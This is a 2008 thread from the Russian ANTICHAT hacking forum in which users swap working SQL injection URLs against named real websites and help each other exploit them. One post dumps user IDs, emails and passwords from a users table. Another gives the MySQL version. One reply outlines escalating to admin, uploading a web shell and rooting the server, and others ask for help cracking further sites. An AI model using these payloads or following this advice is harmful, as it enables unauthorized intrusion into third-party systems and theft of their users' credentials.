ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4001  
Старый 03.12.2008, 22:30
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

Есть, но там по-моему только бенчмарком инфу из бд доставать посимвольно, ибо идет два запроса
 
Ответить с цитированием

  #4002  
Старый 03.12.2008, 22:40
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

0nep@t0p, я бы так не утверждал .. 2 поля и причём вывод есть
http://www.comingsoon.net/news.php?id=1+and+1=0+union+select+version(),1/*
4.1.22
на брут не ставил.. ибо мне это не к чему ..
 
Ответить с цитированием

  #4003  
Старый 03.12.2008, 22:43
zenon2
Новичок
Регистрация: 25.10.2006
Сообщений: 10
Провел на форуме:
120981

Репутация: 1
По умолчанию

тоесть в принципе можно поковырять до конца? может у кого еще какие варианты,?
 
Ответить с цитированием

  #4004  
Старый 03.12.2008, 23:34
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию

Докопался до mysql сервера, благодаря чему есть возможно "дарить" максимальные права для определенных пользователей.
Mysql привязан к директадминЧеку....
Сам вопрос: можно ли при определенных махинациях с Mysql(не брут рутовых паролей) и "дарением" прав конкретным пользователям - получить неограниченный доступ хождения по папкам и файлам.
В то числе и рутовским.
такое можно сотворить?
 
Ответить с цитированием

  #4005  
Старый 03.12.2008, 23:36
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию

Товарищи, будте внимательнее =)
Код:
http://www.comingsoon.net/news.php?id=1+and+1=0+union+select+concat_ws(char(58),user_id,name,email,password,title,access),1+from+NEX_USERS+limit+0,1/*
 
Ответить с цитированием

  #4006  
Старый 03.12.2008, 23:52
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию

Цитата:
Сообщение от Ershik  
Докопался до mysql сервера, благодаря чему есть возможно "дарить" максимальные права для определенных пользователей.
Mysql привязан к директадминЧеку....
Сам вопрос: можно ли при определенных махинациях с Mysql(не брут рутовых паролей) и "дарением" прав конкретным пользователям - получить неограниченный доступ хождения по папкам и файлам.
В то числе и рутовским.
такое можно сотворить?
Ну так для начала подари себе права админа, зайди в админку, через нее залей шелл, порутай систему и сможешь просматривать, под правами root все папки и файлы =)
PS Иначе никак, на то они и рутовские
 
Ответить с цитированием

  #4007  
Старый 04.12.2008, 12:52
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию

Код:
http://db.zenyro.ru/items/use.html'
Возможна ли инъекция?
 
Ответить с цитированием

  #4008  
Старый 04.12.2008, 13:07
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

DimOnOID
да это иьект твоя задача закоментировать не нужные данные запроса и подобрать количество колонок..
Цитата:
http://db.zenyro.ru/items/use.html'+union+select+1,2,3,4,5,6,7,8,9,10--+

Последний раз редактировалось sabe; 04.12.2008 в 13:17..
 
Ответить с цитированием

  #4009  
Старый 04.12.2008, 13:40
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию

Цитата:
Сообщение от sabe  
DimOnOID
да это иьект твоя задача закоментировать не нужные данные запроса и подобрать количество колонок..
http://db.zenyro.ru/items/use.html'order+by+2--+
1 колонка..вывода нету..как слепую заюзать не удаётца
 
Ответить с цитированием

  #4010  
Старый 04.12.2008, 17:33
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию

Проблема с:
Код HTML:
http://www.mcmusic.ie/index.asp?secID=1'&part=1
Помогите раскрутить. Очень нужно
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ